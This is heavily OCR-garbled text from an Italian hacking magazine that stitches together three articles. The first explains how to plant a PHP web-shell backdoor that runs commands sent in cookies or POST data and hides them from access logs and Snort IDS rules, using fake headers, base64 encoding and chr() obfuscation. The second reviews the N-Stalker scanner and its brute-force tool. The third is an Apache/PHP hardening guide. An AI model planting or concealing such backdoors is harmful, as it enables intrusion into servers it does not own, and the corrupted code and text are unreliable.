Gecko/20101203 Firefor/3.6.13" 

E questa è la traccia lasciata nei log: 

a.b.cr-d - - [12/ Jan/2011: 16: 12 :27 +0100] 
"GET /testS.phj) HlTP/1,1" 200 105 »-* "Mo- 
zilla/5, 0 (Windows; 11} Windows NT 6.1; it; 
rv: 1.9.2.13) Gecko/2O10iZO3 Firefoji/3,6, 13" 

Apparentemente sembra che abbiamo raggiunto un buon 
livello di occultamento, Il metodo con cui fo script viene in- 
vocato è GET e nessun parametro è loggato, Ma proviamo 
a confrontare questa evidenza con la traccia lasciata nei 
log da un client legittimo: 

ìp__clieot - - [12/Jaa/201l! I2i37:U +0100] 
"GEI /test3.pnp HSEP/1.1" 200 24 "Hc- 
zilia/5.0 (Windows; U? Windows UT 6.1; it; 
rv:1.9.2.13) Gecko/20101203 Fira£ox/3 , 6 . 13" 

Ciò che si evince è che la richiesta regolare di un client ver- 
so questa pagina produce una risposta di 24 byte, mentre 
quando viene attivata la backdoor, la dimensione dei byte ri- 
tornati varia in funzione dell'output prodotto in risposta al co- 
mando trasmesso. Questo in un certo qua! senso potrebbe 
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diventare un segnale di allarme agii occhi di un amministra- 
tore di sistema attento. A seconda di come è configurato 
il web server in cui risiede la backdoor sì può comunque 
raggiungere un livello di occultamento ancora maggiore. 
Volendo proporre un esempio ramerete, per testare gli 
script di questo articolo, in redazione abbiamo utilizzato la 
versione di default di Apache fornita con CentOS 5,5. In 
questa distribuzione la direttiva LogFormat de! file di confi- 
gurazione del web server viene cosi definita: 

LogFormat "%h il *a tt VUV *>a ib \"3{Re- 
ferer}iV" \"^{Uscr-Jlgentji\"" cambini? 

Dal manuale di Apache si apprende che %b rappresenta 
la dimensione in byte dei dati ritornati al client, esclusi gli 
fieader HTTP. Ciò significa che se facciamo In modo che 
la backdoor ritornì, come parte dBgli header HTTP, l'ou- 
tput del comando' che le è stato efi iesto di eseguire, sia la 
richiesta proveniente da un client lecito Che quella prove- 
niente dall'attacker lasceranno nei file di log esattamente le 
stesse evidenze. Ecco un esempio concreto: 

Alenarne: tesM.p/ip 

Sheader { * Header-xxs : * . Sexec ( S_ 

C0OKIE['cmd'3))l 

cono "<p>fiPPLICflZIOttE XT£Z</b>"; 

ì> 

Osserviamo cosa accade invocando il nuovo script con 
curi. In questo caso per vedere l'output del comando tra- 
smesso utilizziamo l'opzione -v [verbose): 

$ curi http: //ip_scrvcr/teft4.php -b 
"cmd^id" -A "MQZÌlla/5.0 (Windows} 
Ut Windows si 6,1; it; ry:I.9.2.13) 
Gecko/20101203 Firefax/3 .6 ,13" -V 

BTIP/1.1 200 OR 

Date: Xha, 13 Jan 3011 14:50:48 GMI 

Server: Apache il . 1 . ì (CentOS). 

[-1 

Header-mt! uid=4S(apaehe) gid=48(apache) 

gro«ps=48(apache) 

[-] 

<P>APPL1C»2I0KE XTTZ</p> 

Comevolerasidimostrare l'oi^utdel co mandoid viene ri por- 
tato dentro Head er-XXX. Ed ecce la tracela [asciata nei log: 

ip^elieot - - [13/Jan/2011:12;Ì7:11 +0100] 
"GEI /testa. php HITP/1.1" 2Q0 24 "-" "Mo- 
silla/5.0 (Windows; II; Windows HI 6.1; it; 
rv;1.9.2.13j GccW2C1012D3 Fircfox/3 . b, 13" 

perfettamente uguale a quella lasciata da un client legit- 
timo. L'occultamento nei file di log a questo punto si può 
considerare completo. Ma cosa succede se tra l'attacker 



ed il web server target è installato un Network Intru- 
sìon Detection System (NIDS)? Per fornire una risposta 
esaustiva 

basta dare una rapida occhiata ad alcune delle regole 
caricate di default da Snort. certamente il software open 
source di Intrusion Detection/Prevention più conosciuto 
al mondo. Dal file attack-rcsponses.rule* 

slart ip any any -> any any 
(msg: "ATTACK-RESFONSES id check refcur- 
ned root"; content: "uid=0 1 2SJ roòt | 29 | 
mctadata:policy balanced-ips drop, policy 
securlty-ìps drop; classtype:bad-UQkn.own; 

sid:498; rev;7;) 

alert ip Shome_het any -> SEXTÉRlffil_llEI any 
(nsg:"?iTTACK-RESPONSF,S id check returned 
usarid"; eontant: "uid=" ; nocase; coatont:" 
gid="; distance:0; pere: "/uid=\d{l,5)\S4\ 
s +gid= \d { 1 , 5 } / siili " ; c la ststypE : bad-ufikmivffl ; 
sidil3S2; revili;) 



Si tratta di alcuni esempi rappresentativi di regole che 
analizzano il traffico di rete alla ricerca di contenuti ci 
diano evidenza di un problema di sicurezza. In entrambi 
Casi le regole segnalano un'anomalia se viene ricostruiti 
una sessione dati riconducibile all'output del comand~ 
"id". Il perché dell'esistenza di queste regole è dew 
al fatto che originariamente gli exploit old-school (quel 
ohe per inteso sfruttavano una vulnerabilità su un di 
mone di rete e non un banale XSS su un'applicaziom 
web) dopo aver eseguito un bind o reverse shellcode 
lanciavano in automatico "id" come primo comando d' 
la sessione prima di accettare ulteriori comandi dall'at- 
tacker. Nel corso degli anni quindi l'output del comand 
"id" trasmesso da un sistema della rete interna ve 
Internet, è chiaramente divenuto un probabile segnale 
Intrusione da rilevare. 



1 



Atal proposito, nella configurazione di un IDS, sono 
litamente presenti numerose regole che rivelano anch. 
la probabile interazione di un attacker ccn una shell, in- 
tercettando il banner del prompt dei comandi trasme 
su porte non comuni di una sessione TCP. Eccone u 
esempio: 

alect top $H0ME_HET >21;23 -> $BSTERHAL_H1T 
any (msg: "ATMCK-RESPONSES Microsoft cmd.citc 
banner"; DowieEtablisiicd; content; "Microsoft 
Windows"; content :" | 58 |c| 29 | Copyright 1985. 
"l distante: 0; content : "Microsoft Corp."; 
distance:0; mctadata:policy fialsnced-ips 
drop, policy eoniiaetivity-ips drop, policy 
security-ips drop; reference:nesstis r 11633; 
c 1 a sstype : succes s f ul-adnii n ? £ id : 2 1 2 3 ; 
rav : 4 ; ) 
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Ai fini della nostra discussione è evidente quindi che tra- 
smettere in chiaro testo l'output riportato dalla backdoor 
non rappresenta la migliore tecnica di occultamento cria pos- 
siamo mettere in campo ma, con un semplice accorgimento, 
possiamo eludere potenzialmente anche i controlli di Snort. Ad 
esempio si può pensare ad una modifica di questo tipo! 



alenarne: testS,php 
<7php 

if (isset (5_CdOKIE J ) ?header f" Héa<ìer-XM! i • . 8 
base64_Gneodo(ee*e!;(5_C00KI£[ 'caid' J >)); 
oche - <j»A?n.ICA2IOM XYK/p>- ( 
?> 

In questo caso il comando eseguito dalla backdoor vie- 
re inserito rielr'header fittizio Header-XXX ma restituito 
codificato in base64: 



$ curi http: //ip_servez/test5.php ~b 
"camì=id" -A "MozillatS.O (Windows; 
ti; Windows NI 6.1; iti rv:1.9.ì,13) 
Gecko/20102203 Flx*£oxM.6.ì3" -v 



HSSP/1.1 200 OK 

L-J 



Per decodificarlo al volo possiamo avvalerci dell'utility 
base64 che su CentOS fa parte del pacchetto coreutils: 



$ ocho dfìlkPTj..] j base64 -i 
uid=4B (Apache) iricN4B(apache) 
giraup5= as(apachc) 



In generale per rimanere nascosti agli occhi di un IDS le 
codifica baseE4 pui essere sufficiente ma, ovviamente, 
aggiungere un ulteriore layer di compressione dei dati o 
cifratura con algoritmo crittografico simmetrico, può offrire 
livelli di occultamento superiori. 



Conclusione 

Prima di concludere sono doverose alcune considerazioni, 
Anzitutto modificare i sorgenti di un sito per introdurre una 
backdoor è un'attività che può essere facilmente identificata 
de un HIDS (Host Intrusion Detection System) come tripwi- 
re o Samhaln, Nella realtà però gli amministratori di sistema 
odiano utilizzare questi strurrtenli per monitorare le directory 
che possono contenere file in continua evoluzione come log 
o appunto pagine html, script php. etc... pertanto l'attacker ha 
sempre una buona chance di rimanere nascosto. 



Mei tentativo di rendere un po' più difficile l'individuazione del- 
la baokdoor e facendo Sèguito ad un trend affermato da anni, 
soprattutto nello sfruttamento di vulnerabilità Che colpiscono i 
browser e che utilizzano Javascript come vettore di attacco, 
si può cercare di mascherare il codice o le funzioni invocate 
in modo da sostituire i caratteri ASCII con la relativa codifica 
numerica, utilizzando chr( ) come sotto mostrato: 



I 



#eho "<p>aj>PLICMIONE XYZ</p>"; 
//$b - 'gpassthru' 

Sa='Sp' ,ehr(112) .oiir(97i.chr(115) -Cbr(Il5) ■ 
chr(116) .cflri.104) . 'ni' ; 
$a($_PQST[ 'end']); 



Infine è opinione di alcuni esperti (ed anche della nuova re- 
dazione di Hacker Journal) che il modo migliore per impa- 
rare l'arte dello stealthing (o perlomeno per raggiungere 
un buon livello di occultamento) sia di installare un MIDS 
come Snort nella propria rete ed osservare il suo compor- 
tamento. Questo può risultare un modo perfetto per impa- 
rare a capire il tipo di disturbo o di evidenza prodotti nei log 
di un IDS dopo ogni singola azione compiuta in rete. 
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L'azione di qualsiasi 
hacker è preceduta da 
una fase di analisi da! 
proprio obiettivo. Un 
po' come avviene in 
una partita di calcio, dove una 
squadra rilevai punti deboli 
dell'altra, anche nel campo 
della sicurezza informatica 
c'è bisogno di verificare dove 
sì può agire. E questo, sul 
versante opposto, è quanto 
dovrebbe fare ohi tiene sotto 
controllo la sicurezza di un 
sito. Il secondo, tuttavia, non 
è sempre mosso dalla voglia 
di conoscenza del primo, e 
preferisce rivolgersi a software 
belli e pronti ohe svolgano 
il lavoro sporco in completa 
autonomia [o quasi). Si tratta 
dì programmi molto costosi e, 
nella maggior parte dei casi, 
chiusi. E a volte pure capaci 
di violare l'etica hacker, anche 
se questo non significa che 
non possano tornare utili 
proprio.,- agli hacker. Tra questi 
c'è N-Stalker, web-scanner 
che non ha certo bisogno 
di presentazioni e Che, forte 
di un'interfaccia gradevole, 
dispone di un discreto 
armamentario di funzioni in 
grado di rilevare le più recenti 
vulnerabilità dei web-server. 
Noto anche per un prezzo 
tutt'altro che abbordabile 
{si parte da circa 270 €), da 
qualche tempo N-Stalker 



MONITORING 
E CHI L'HA 
n FTTD CHE 
TROVARE 
FALLE NEI WEB- 
SERVER SIA UNA 
PROCEDURA 
LUNGA E_ 
NOIOSA? 



Alcuni degli sfrumenfi; 
a disposizione di 
N'Stalker. Come 
passiamo vedere, non 
Solo analisi... 



è disponibile anche in una 
versione totalmente gratuita. 
Ovviamente c'è qualche 
limitazione rispetto alle edizioni 
commerciali, ma la dotazione di 
base vai bene una prova. 



INSTALLAZIONE 
IN POCHI CLIC 

N-Stalker Free Edition è 
disponibile all'Indirizzo nstalker. 
com/productsyfree, Una volta 
qui, si clicca in basso a sinistra, 
su Click to download Free 
Version, e si compila il modulo 
online. Nessuno ci obbliga 
a inserire dei dati veri, ma 
l'indirizzo dì posta elettronica 
deve essere quanto meno 
"raggiungibile". Infine si clicca 
su Send e si va all'indirizzo 
e-mail specificato, dove si 
trova il link da cui scaricare 
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l'applicazione, che Sta in tir 
file di circa 1 3 MB. Effettuato il 
download, non resta che fare 
doppio clic sul file e procedere 
con la semplice installazione, e 
avviare N-Stalker Free Edition. 
All'avvio-, il programma si 
occupa di verificare la presenza 
di aggiornamenti (se disponibili 
è bène installarli subito) e, in 
capo a pochi istanti, ci mette 
di fronte alla sua interfaccia 
principale. 

Utilizzare questo software 
è molto semplice, se non 
abbiamo particolari esigenze: 
digitiamo l'indirizzo del web- 
server da controllare, nella 
finestrella centrale, e poi 
utilizziamo il menu a tendina, 
che sì trova in parte, per 
selezionare il tipo di controllo. 
Ce ne sono cinque diversi, 
ciascuno preposto a un'analisi 
specifica. Una volta selezionato 
questo parametro, non ci resta 
che cliccare su Start Scan 
Wizard. Si avvia uno wizard, 
cioè una procedura guidata 
' alla scansione del sito. Nella 
prima finestra possiamo 
caricare i parametri di una 
scansione precedente o di uno 
spider, Oppure passare oltre, 
cliccando direttamente su Nesct, 
A questo punto la finestra di 



Ottimizzazione, Optimizing 
Settings, consente un'ultima 
ottimizzazione del processo di 
analisi, effettuabile cliccando 
su Optimize. In questo caso, 
N-Stalker esegue una serie di 
test per modificare al meglio i 
parametri di controllo. Anche 
a basso livello, cliccando su 
Scan Settings. Quando tutti 
i parametri sono configurati, 
clicchiamo su Next, rivediamo 
le impostazioni scelte e, 
per procedere con la vera 
scansione, clicchiamo su Start 
Session. 

Un avviso Ci ricorda che la 
versione Free Edition si limita 
all'analisi delle prime cento 
pagine del sito desiderato: più 
che sufficienti per una buona 
prova sul campol Per finire, 
una volta arrivati alla pagina 
della scansione, clicchiamo su 
Start Scan, in alto a sinistra, 
e osserviamo l'avanzare della 
scansione. 

Dopo qualche minuto (ma 
il tempo è variabile in base 
alla velocità della nostra 
connessione e agli esiti dei 
test], compare una finestra che 
ci dà la possibilità di salvare i 
risultati dell'analisi, che sono 
poi mostrati in tutto il loro 
splendore. 



Numero di pagine esaminate, 
vulnerabilità trovate, cookie e 
indirizzi e-mail presentì, sono 
solo alcune delle prelibatezze 
elargite da N-Staiker Free 
Edition. Il quale non limita alla 
sola analisi le sue possibilità. 
Per esempio, dalla pagina 
iniziale passiamo selezionare 
anche l'http Brute Force, un 
potente e completo strumento 
in grado di eseguire sempiici, 
ma efficaci, attacchini forza 
bruta. Con la possibilità di 
caricare file di testo che 
elencano nomi utente e 
password, o specificare 
particolari espressioni di 
autenticazione. 
Al di là delle funzionalità, 
estese ed entusiasmanti, di 
un software molto diffuso 
In ambito professionale e 
finalmente disponibile in una 
versione gratuita, N-Stalker 
si fa apprezzare anche per 
le prestazioni. La velocità di 
scansione, considerate le 
analisi approfondite effettuate, 
è elevata e consente di farsi in 
pochi minuti una precisa idea 
sui punti deboli di un web- 
server, A quel punto, forti di 
queste informazioni, agire, "in 
un senso o nell'altro", è molto 
più semplice. 
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in questo articolo scopriremo 
come configurare in sicurezza 
un server web nella clas5ica 
implementazione apache - php - 
myBLTJL con gnu/Linux debian. 



Nella pratica comune di 
qualunque sistemista 
capta di dover 
configurare un server 
Web per consentire la 
pubblicazione online di 
siti e file, Spesso il committente è un 
Cl iente con infrastruttura proprietaria 
(server ubicati presso la propria sede 
con connettività, di solita, HDS'L o 
fibra) oppure è formulata la richiesta 
dì configurare un server dedicato, 
fisico o virtuale che Sìa, Vi sono poi 
situazioni in cui si vuole rendere 
disponibile il servizio Web a titolo 
personale utilizzando il proprio PC di 
casa od una maochina, comunque 
domestica, preposta a quest'utili™. 
Indipendentemente dalle finalità ultime 
e dai motivi che portano il lettore 
all'insolazione di un servizio HTTP, in 
questo articolo analizzeremo alcuni tra 
gli strumenti di eccellenza adoperati 



nella realizzazione di Web Server sicuri, 
scalabili e capaci di gestire più utenze 
contemporaneamente. GNU/Linux 
risulta ormai da anni la scelta preferita 
per versatilità, semplicità di utilizzo, 
prestazioni e sicurezza offerta. Se 
a questo sommiamo anche il costo 
praticamente nullo (non esistono infatti 
costi di licenza legati agii applicativi 
che scopriremo nel corso dell'articolo e 
GNU/Linux Debian stesso è un Sistema 
Operativo OpenSource gratuito e 
distribuito con licenza GPL) risulta 
immediato comprendere il perché 
di questa scelta. Iniziamo quindi col 
definire lo scenario di nostro riferimento 
cercando di renderlo quanto più 
vicino alle richieste consuetudinarie, 
sia che provengano da. clienti terzi, 
sia che riguardino la messa online di 
file personali attraverso il nastro PC, 
Come già detta il Sistema Operativo di 
nostro riferimento sarà GNU/Linux, la 



distribuzione adoperata, per praticità e 
semplicità degli strumenti amministrativi 
e di installazione offerti è Debian. La 
release consigi iata per questi utilizzi è 
naturalmente quella appartenente al 
ramo Stable (al momento Lenny) per 
quanto le operazioni che vedremo di 
seguito risultano immutate anche per 
Il ramo testing ed unstable (siti). Ci 
preoccuperemo pertanto di configurare 
il server HTTP offerto dalla Apache 
Software Foundation (WWW.apaohe.org), 
il DBMS Mysql nella sua quinta versione 
ed il linguaggio di scripting PHP. 
Particolare attenzione sarà posta alle 
tematiche inerenti una configurazione 
genuina dei servizi appena citati capace 
di garantire sonno tranquilli anche a 
programmatori per II Web più sbadati. In 
quest'ottica saranno oggetto til analisi 
le patch ModSecuffiy e ModChroot 
disponibili per il server Apache, una 
configurazione ottimale dell'interprete 
PHP attraverso l'hardening del suo file 
di configurazione (php.inf) ed alcune 
funzioni di libreria dello stesso linguaggio 
di programmazione volte a minimizzare i 
rischi di vulnerabilità a cui son sottoposti 
gli script sviluppati. Mondi minore 
importanza saranno le tematiche 
connesse alla corretta gestione del 
servizio Web in ordine di disponibilità 
e fruibilità. Vedremo quindi come, 
attraverso l'ausilio di una ulteriore patch 
per Apache (ModBandwìdih), come è 
possibile bilanciare il traffico generato 
dal Server Web.lnfine, la configurazione 
degli host virtuali (vhost) chiuderà 
l'articolo permettendoci di comprendere 
come sia possibile gestire più clienti/ 
siti, anche con configurazioni totalmente 
diverse, adoperando un unico server 
fisico, Protagonista principale della 
nostra trattazione è il demone httpd 
ofFerto dafla Apache Foundation, le cui 
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caratteristiche possiamo apprenderle 
col legandoci con il nostro browser 
all'indirizzo httpd.apache.org. 



INSTALLAZIONE DI 
APACHE HTTPD 



La sua installazione sii Debian Lenny è 
elementare essendo distribuito in forma 
binaria periate OS e perenni architettura 
supportata sotto il nome "apache2". 

Prima di installarlo è buona prassi 
aggiornare il sistema all'ultima versione 
disponibile, comprensiva degli 
aggiornamenti di sicurezza rilasciati dal 
Debian security team. 

Digitiamo da shell di root i comandi: 

S apt-get update 
# apt-get upgrade 



Il primo si occuperà di prelevare dai 
repository Debian gli indici relativi alte 
ultime versioni dei pacKsges disponibili, fi 
-secondo procederà con l'aggiornamento 
degli applicativi e dei servizi dell'intero 
sistema alle uttime retsase disponibili 
ed indicizzate precedentemente con il 
comando "update". 

Concluso il processo di aggiornamento, 
che impiegherà un tempo variabile in 
"funzione delta velocità della nostra linea 
e delle caratteristiche hardware del PC di 
riferimento, procediamo all'installazione 
di Apache 2, confermando la nostra 
intenzione di prelevare il pacchetto 
stesso e le dipendenze associate 
digitando "S" non appena richiesto dal 
packages manager: 

it apt-get instali apachea 

Continuare [S/n]? 3 

L'installazione si concluderà nel giro 
di qualche minuto ed al termine, 
collegandocì all'indirizzo "localhosf 
potremo visualizzare la tipica pagina "W 
works! " a dimostrazione dell'effettivo 
iunzionaiTiento del Server Web. 

Testato il funzionamento del demone 
httpd stoppiamolo. Procederemo con la 
sua configurazione di base ipotizzando 
l'utilizzo dello stesso per un solo sito 



ospitato sulla macchina in uso tra poco, 

# /etc/init.d/apadie2 stop 
Stopping web server: apac3ie2 ... waiting 



INSTALLAZIDNE 
DI MYSQL E PHP 5 



MySQL è un database relazione 
largamente adoperato nella scrittura dì 
siti e Web Application soprattutto insieme 
al suo ormai consolidato braccio destro 
linguaggio di programmazione PHP. 
La sintassi adoperata è la SQL, attraverso 
cui è possibile gestire dati memorizzati 
sottoforma di dabase regolati dal modello 
relazionale. 

Come perApacne, l'installazione su 
Debian Lenny è un gioco da ragazzi. Da 
shell, con privilegi di root, invocheremo 
nuovamente apt-get come di seguito: 
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instali' mysqk 



Al termine delta procedura d i installazione 
imposteremo una password per MySQL 
relativa aflf utente root digitando da shell: 

# mrysqladmin -u root password 
'PASSWORD' 

Sostituendo, naturalmente, 
'PASSWORD' con la nostra password e 
mantenendo le virgolette. 
PHP, giunto alla release 5 e prossimo alia 
sesta (per Cjuanto in questa direzione il 
progetto sembra aver trovato una battuta 
di arresto) è tra i principali linguaggi 
adoperati per lo sviluppo di siti e Web 
Application. La sua forza sta nella sua 
semplicità e nel tetto di poter contare su 
una comunità dì sviluppatori pressoché 
infinita. Installiamolo pertanto insieme al 
worher per MySQL ed al la secu % patch 
"Suhosin" del progetto HarcJened PHP: 

# apt-get instali phpS phpS-mysqi phpa- 
suhosin 

Concluso il processo di installazione 
andremo ad edÈtare alcune direttive del 
file di configurazione dell'interprete al 
fine di limitarne le capacità ed, in questo 
modo, garantire maggiore sicurezza. 
I iscì nostro interesse è 7etc/phpó7 
apache2fpnp.ini", Per ogni riga da editare 
offriremo una breve spiegazione di quel 



che andiamo a fare. 
In primo luogo disattiviamo la direttiva 
Safe Mode (deprecata a partire dalla 
release 5.3 di PHP) Essa si occupava 
di limitare la liberta del Singolo utente 
in contesti server-shared, ovvero 
impedire che gli script di X user 
potessero interferire con quelli di Y 
user dal momento che entrambi sono 
letti dal webserver dallo stesso utente 
relativo al demone Apache (www-dataj 
e con gli stessi privilegi (di solito di sola 
esecuzione +4 La patcti Suhosin mette 
un punto a questo come a tenti altri cavilli 
che spesso affliggono Web Server in 
produzione in presenza di sorgenti PHP 
fallati. 

safejnocfe = Off 
safe_mode gid = Off 

Restringiamo il raggio d'azione delle 
direttive di inclusione utilizzabili negli 
script alla sola directory radice del 
server web (ulteriori constatazioni le 
effettueremo nel prosieguo dell'articolo 
inerenti la configurazione della patcti 
ModChroot per Apache): 

open_baseciir = /var/www 



Disabilitiamo alcune funzioni del 
linguaggio che consentono di eseguire 
comandi sul server dal momento 
che. nel 90% del casi, non servono 
e rappresentano esclusivamente una 
possibile criticità: 

disablejunctions = e*ec, passthru, 
shell_exec, system, proc_open, popen, 
curLexec, curfjnuItLexec, parsejnijile, 
show source, php_uname, getmyuid, 
geimypid, leale, listen. diskfresspace 

Disattiviamo la segnalazione degli errori 
m modo da limitare l'eventuale fuga di 
informazioni in caso di errori imprevisti 
nel codice e tentativi di attacco di tipo 
SQL Inlection: 

dìsplay_errore=Off 

Assicuriamoci che la direttiva Register 
Globals sia disattivata. Questo 
modo di sviluppare appartiene ormai 
all'archeologia, occupandosi di utilizzare 
variabili HTTP senza Specificare la 
provenienza delle stesse. Nel caso ad 
esempio della variabile "pippo™ ricevuta 
via GET era possibile richiamare la 




L 




per far frizionare il servizio. La chiamata 
di sistema chrootQ viene eseguita 
quando le librerie ed i file di log sono 
stati rispettivamente carteati ed aperti. In 
prima istanza ci occuperemo pertanto 
cfi ricreare dei percorsi funzionanti per il 
server Web nella directory "Aiar/www": 

# mkdir -p /var/wWwVar/WWW 

# mkdir -p /var/www/tmp/php_uploads 

# mkdir -p /VarAvwvj/trnp/php sessione 

# chown -R wmv-data:wwvu<iata /vw/ 
www/tmpy 

# mkdir -p A'ar/www/var/run/mysqld 

# chown -R mysqtmysql A/ar/wwvwVar/ 
run/mysqld/ 

# mkdirA/arAvww/etc 

# cp /etc/resollv.conf Arar/www/etc/ 

Modifichiamo ora il file di configurazione 
di MySQL indicando il nuovo percorso 
per la creazione del socket e del pid: 

# vi /etc/mysql/my.cnf 
[Client] 

pori = 3306 

socket =/var/vjwvj/var/iun'mysqld/' 
mysqld.sock 

[mysqld safe] 

socket =.'var/www/var/run/rnysqld/ 

mysqld.sock 

nfce =o 

[mysqldj 

user = mysql 

pid-fi le = /varAwwAfar/run/mysqld/ 
mysqid.pid 

socket = /VarA\ , ww/var/rurVmysO;ld/ 
mysqld.sock 

# vi /etc/mysqltìebian.cnf 

socket = /varAvww/var/ruryrnysqld/ 
mysqld.sock 

sockei =A'ar/WWw/var/nin/mysqld/ 
mysqld.sock 



-rw-rw— -1 1Q7116 5 15 lug 17.34 
mysqld.pid 

srwxrwxfwx 1 107116 015 lug 17.34 
mysqld.sock 

Provvediamo ora a modificare 
opportunamente la configurazione di 
Apache per segnalare i cambiamenti 
avvenuti. Editiamo il file 7etc/apache2' 
apacheS.conP modificando il file relativo 
al percorso dell'ID del processo {PID) ed 
abilitando ModChroot: 

# vi /etc/apacheS/apacheS.corf 

iPkJFile /var/rLn/apacrie2.pid 
CnrootDir Aer/mnv 



Infine, installiamo la moti digitando da 
shell: 

# apt-get instali libapaehe£-mcti-chroot 



C □ N FI E U R AZ IONE 
VIRTUAL HfJST 



La directory entro Cui apportare le 
configurazioni dì Apache su GNU/ 
Linux Debian come abbiamo potuto 
notare finora è ubicata al percorso 7 
etc/apache2", osserviamo ì file e le 
sottocartelle contenute snodando alcune 
considerazioni da tenere a mente: 

#ls -na/etc/apacheS/ 
apachez.conf 
conf.d 
enwars 
httpd.conf 
magic 

moda-ava) latte 
mods-enabled 
pons.conf 
sites-available 
sites-enabled 



#/eto'init.d/mysql stop 
S/etc/initct'mysql start 
tf ls -na /var/wAw/var/run/mysqfd/ 
totale 12 

dr,vxr-xr-x 2 1 07 1 1 6 4QS6 15 Sug 17.34 . 
drwxr-xr-x 3 0 0 4M6 1 5 lug 1 7.20 .. 



Stoppiamo e riawiamo quindi il servizio 
MySQL controllando che ii socket ed 
il pid file siano stati salvati nel nuovo 
percorso: 



Le cartelle ? conf.d", "mod-available/ 
enabled" e "sSes-avàlable/enabled™ 
funzioneranno come directory di 
inclusione riferite al file di configurazione 
' : apache2.conf ' e rispettivamente 
conterranno al toro interno le 
impostazioni del server, gli addon 
(mod) disponibili ed attivi con i propri 
file di configurazione e gli indirizzi per i 
quali vogliamo rimanere in ascolto ed 
attivare il Web Server (vhosi), Di questi 




stesse come Spippo piuttosto che 
$_GETTpippO'l- La conseguenza di ciò 
è facilmente intuibile potendosi riferire, 
da parte di un attaccarne, ad una 
variabile adoperata nel nostro sorgente 
richiamandola sempiioemente via URL: 




register_globals = Off 

Per quanto non sia una risposta 
definitiva agli attacchi di tipo ;: remote 
file indusian" (in quanto l'unica concreta 
protezione contro questa tipolog ia di 
attacchi è data dalla patch Suhosin) è 
comunque raccomandabile disabilitare 
l'inclusione da URL e l'apertura di file da 
remoto negli script: 

a!low_urt_fopen = Off 
allowjurljndude = Off 

Qualora non vi sia l'esigenza di 
consentire l'uptoad di file via PHP 
disabilitiamo questa funzionalità (file_ 
uptoads - Off}, viceversa indichiamo 
un percorso dove conservare i file 
temporanei (entro il quale magari 
attiveremo un controllo Antivirus 
costante) e la dimensione massima degli 
stessi (un valore accettabile, ai tempi del 
Web 2.0, può essere E Mb): 

uploadjrnpjir = /tmp/php_uploads 
iipload_max_filezize - 8M 



Indichiamo un percorso non standard 
entro il quale salvare le sessioni 
eventualmente generate dagli script 
in modo tale che sia difficile riferirsi 
alle Stesse da parte di un utente con 
accesso shell: 

sessron.save_patfi - /tmp/ptip.sessions 



Qualora non strettamente necessario 
impediamo ad eventuali Javascript di 
poter utilizzare le sessioni generate ai 
fine di prevenire fastidiosi attacchi di tipo 
XSS: 

sessioacootfejTttponly - 1 

ModChroot è un'interessante patch per 
Apache che ci permette di restringere 
fenvironment entro cui il server opera ad 
una determinata directory. A differenza 
di una classica operazione di chrcot di 
Apache, la mod si occupa di avviare 
Apache in Jail senza dover ricostrurire 
l'intero albero di file e librerie rtecessare 
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che, per ora, abbiamo ipotizzato tira 
configurazione per singolo nastrarne 
(quello relativa alla macchina in uso 
rintracciabile nel file "v'etc/hostname" o 
comunque all'indirizza IP del PC). 
Importante precisare ohe gran parte 
delle modifiche e delle configurazioni 
da apportare ad Apache 2 sono 
gestite attraverso il blocco istruzione 
<VìrtualHo5t>. Questa è una modifica 



im pedine il Listing d i una directory qualora 
non vi sia nessuna delle pagine appena 
citate all'interno della stessa. Vogliamo 
abilitare un logging abbastanza severo 
che tenga conto anche dei messaggi di 
avviso e non solo degli errori, 
In base alle constatazioni fatte, il nostro 
file di configurazione (/etc/apache2/sites- 
enaHecMOu-default) sarà: 



Occupiamoci ora di editare il file 
riferendoci ad una configurazione che 
tenga conto delle seguenti condizioni. 
La directory radice contenente i file Web 
da rendere disponibili online vogliamo 
che sia quella Ubicata al percorso 7var/ 
www" (ohe, adoperando ModChroot 
corrisponde al percorso "/var/www/ 
var/www" sul nostro disco). Vogliamo 
consentire al Server di percorrere i link 
a file. Vogliamo stabilire come prioritari 
alla visualizzazione le pagine, nell'ordine: 
ìndex.pbp, inrjex.html, index.htm, home, 
php, home.html, home.htm, default. 



<VirtualHos! *:80> 
DocumentRoOt /varAvww 
Director/Index index.php index.html 
index.htm home.php home.html home, 
htm defeultphp default-titml default.htm 
<Directory /var/www/> 
Options FollowSymLinks 

AltovjOverride None 

Orderallow.derry 

ajlow from ali 
</Directory> 
LogLevel warn 

ErrorLog /var/log/apache£/error.log 
CustomLog /varylog/apacheE/aceess.log 
combined 
<A/irtualHost> 



LOAD BALANDING 



Garantire la possibilità di visualizzare 
il proprio sito in tempi decenti senza 
ricorrere alia pessima pratica del "best 
efforf" dovrebbe essere tra le prime 
operazioni da eseguire quando si 
configura un server Web. Le metodologie 
per farlo sono fante, ognuna con i suoi 
prò ed I suoi contro. Quella che ci sembra 
più semplice ed al tempo stesso efficace 
è l'utilizzo di ModBaixJwidth.Installiamola 
come finora fatto per ogni applicativo, 
ovvero adoperando il packages manager 
del sistema ed abilitiamola: 

# apt-get instali ]ibapac}ie2-mod-bw 

# a2enmod bw 
Enabling module bw. 

Run Vetc/init.d/apache2 restart' to 
adivate new configuratici ! 

ModBandwidth può essere adoperata 
In modo da intervenire a livello globale 
(su tutti i Siti eventualmente ospitati dal 
server) oppure, caratteristica ancora più 
interessante, direttamente a livello Vhost. 
limitando singolarmente un determinato 
sito a valori di banda predefiniti. Per 
quanto attiene alla configurazione 



BandWidthModuleQn 
ForceBandWidth Module Qn 
BandWidth ali 252144 
MinBandWidth ali 4096 
LargeFiteLimit _ 10240 2048 

Alla riga 1 abbiamo attivato i! modulo, alfe 
seconda imponiamo che ogni richiesta 
venga analizzata dal taad balano» , Alla 
terza abbiamo quindi impostato una 
banda massima utilizzabile pari a 2mbps 
garantendo, alla riga 4, un minimo di 
32kbps per utente. All'ultima abbiamo 
limitato il download dei file superiori a 
1 0Mb a 1 Skbps, privilegiando in questo 
modo la normale navigazione web. 
Disabilitiamo la stampa del banner e 
dell'header HTTP da parte di Apache 
editando il file ''/etc/apache2/ccnf.d/ 
security": 

#vi /etc/apache2'conf.d/security 

ServerTokens Prod 
ServerSignatureOff 

Carichiamo quindi una pagina di prova 
per controllare il buon esito delie nostre 
operazioni ed avviamo Apache: 

# od /Var/wvAv/van'www/ 

# vi index.php 
<?php 

Sdbjiost = lacalhost"; 
$dbjjser = "root"; 
$db_password = "pippobaudo"; 
if(rnysql„connect($db_riost 1 |db_user, 
$db_password)){ 

echo "<h1:>lnstallazione di Apache + 
PHP + MySQL avvenuta correttamente^/ 
h1>": 
} 

?> 

#/etc/init.d/apache2 start 
Starting web server; apache2 

